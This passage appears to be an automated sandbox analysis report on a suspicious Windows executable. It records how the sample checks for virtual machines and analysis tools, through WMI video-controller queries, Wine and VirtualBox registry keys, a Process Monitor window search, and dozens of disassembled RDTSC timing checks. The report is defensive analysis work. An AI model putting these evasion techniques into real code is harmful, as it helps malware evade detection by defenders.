Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 364413 second address: 36446F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FAD0D216D63h 0x0000000d jmp 00007FAD0D216D67h 0x00000012 jl 00007FAD0D216D56h 0x00000018 popad 0x00000019 pop ecx 0x0000001a push ecx 0x0000001b jnc 00007FAD0D216D6Dh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 36446F second address: 364475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 346BE0 second address: 346BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 346BE6 second address: 346BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3637FE second address: 363814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAD0D216D5Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 363814 second address: 363825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0CDA85FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 363825 second address: 36382B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 363B61 second address: 363B79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FAD0CDA85F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 363B79 second address: 363B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 363CE8 second address: 363CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FAD0CDA85F6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366BC6 second address: 366BED instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD0D216D58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor ecx, dword ptr [ebp+122D386Dh] 0x00000013 push 00000000h 0x00000015 mov ecx, dword ptr [ebp+122D388Dh] 0x0000001b push 53ED994Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366BED second address: 366BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366BF2 second address: 366BF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366BF7 second address: 366C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 53ED99CAh 0x0000000e mov esi, dword ptr [ebp+122D3875h] 0x00000014 mov edx, dword ptr [ebp+122D392Dh] 0x0000001a push 00000003h 0x0000001c jmp 00007FAD0CDA85FBh 0x00000021 mov edx, dword ptr [ebp+122D39D1h] 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D2C4Fh], esi 0x0000002f xor cx, C92Dh 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FAD0CDA85F8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 jmp 00007FAD0CDA8606h 0x00000055 mov edx, dword ptr [ebp+122D379Dh] 0x0000005b push 783B8740h 0x00000060 push eax 0x00000061 push edx 0x00000062 jnc 00007FAD0CDA85FCh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366DC5 second address: 366DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366ED6 second address: 366EFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FAD0CDA85FBh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FAD0CDA85F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366EFE second address: 366F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FAD0D216D61h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jne 00007FAD0D216D58h 0x0000001c jng 00007FAD0D216D58h 0x00000022 push esi 0x00000023 pop esi 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jg 00007FAD0D216D56h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 366F52 second address: 366FF6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FAD0CDA85FCh 0x00000010 popad 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FAD0CDA85F8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c and esi, dword ptr [ebp+122D3AD9h] 0x00000032 push 00000003h 0x00000034 and dh, FFFFFF9Ah 0x00000037 push 00000000h 0x00000039 mov edx, dword ptr [ebp+122D38EDh] 0x0000003f push 00000003h 0x00000041 clc 0x00000042 push CB4E4557h 0x00000047 jc 00007FAD0CDA8605h 0x0000004d pushad 0x0000004e jmp 00007FAD0CDA85FBh 0x00000053 push ebx 0x00000054 pop ebx 0x00000055 popad 0x00000056 xor dword ptr [esp], 0B4E4557h 0x0000005d add edx, 619FDC21h 0x00000063 lea ebx, dword ptr [ebp+12451ADCh] 0x00000069 sub dword ptr [ebp+122D1C63h], esi 0x0000006f xchg eax, ebx 0x00000070 push esi 0x00000071 push ecx 0x00000072 jne 00007FAD0CDA85F6h 0x00000078 pop ecx 0x00000079 pop esi 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FAD0CDA8604h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 378581 second address: 37858E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 37858E second address: 378592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 387A73 second address: 387A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D64h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 387A8B second address: 387A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 387A91 second address: 387A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FAD0D216D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385972 second address: 385981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0CDA85FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385981 second address: 3859A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FAD0D216D5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3859A4 second address: 3859BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAD0CDA85FFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3859BA second address: 3859E1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD0D216D6Dh 0x00000008 jl 00007FAD0D216D5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385B3F second address: 385B49 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385B49 second address: 385B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAD0D216D5Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD0D216D5Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385E42 second address: 385E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385F8B second address: 385F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 385F92 second address: 385FD0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD0CDA85FAh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnc 00007FAD0CDA860Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD0CDA8600h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 386799 second address: 3867B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D64h 0x00000007 jno 00007FAD0D216D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3867B7 second address: 3867E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD0CDA8603h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007FAD0CDA85F6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3867E2 second address: 3867E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3867E6 second address: 3867EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3867EC second address: 386809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAD0D216D66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 386B07 second address: 386B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3871A8 second address: 3871AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 387313 second address: 387321 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 387321 second address: 387333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0D216D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 387333 second address: 387353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8602h 0x00000007 jc 00007FAD0CDA85F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3874EB second address: 3874EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3874EF second address: 3874F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3874F3 second address: 3874F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3874F9 second address: 3874FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38EC85 second address: 38EC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD0D216D5Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38EC9A second address: 38ECB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAD0CDA85F8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FAD0CDA85F6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38D3C3 second address: 38D3E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAD0D216D69h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38D3E9 second address: 38D3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38ED88 second address: 38ED92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38EF0C second address: 38EF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38EF12 second address: 38EF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 38EF17 second address: 38EF1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39261B second address: 392639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D68h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39291D second address: 392941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FCh 0x00000007 jnp 00007FAD0CDA85F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FAD0CDA85F6h 0x00000017 jnl 00007FAD0CDA85F6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 392941 second address: 392956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 392F3D second address: 392F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FAD0CDA85FFh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 392F57 second address: 392F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3941EC second address: 3941F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3941F0 second address: 3941FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3941FA second address: 3941FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3941FE second address: 394235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FAD0D216D62h 0x00000011 pop eax 0x00000012 mov edi, dword ptr [ebp+122D37A5h] 0x00000018 call 00007FAD0D216D59h 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007FAD0D216D58h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3945CE second address: 3945D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3946AA second address: 3946AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394783 second address: 394787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394E94 second address: 394E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394E98 second address: 394E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394E9E second address: 394EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0D216D69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394F52 second address: 394F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394F5D second address: 394F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 394F61 second address: 394F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39503D second address: 395057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0D216D66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 395057 second address: 395069 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3953FE second address: 395408 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD0D216D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 395954 second address: 39595A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39595A second address: 3959D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FAD0D216D61h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FAD0D216D58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FAD0D216D58h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 push 00000000h 0x00000044 xor edi, dword ptr [ebp+122D38FDh] 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 jmp 00007FAD0D216D5Ch 0x00000055 popad 0x00000056 rdtsc
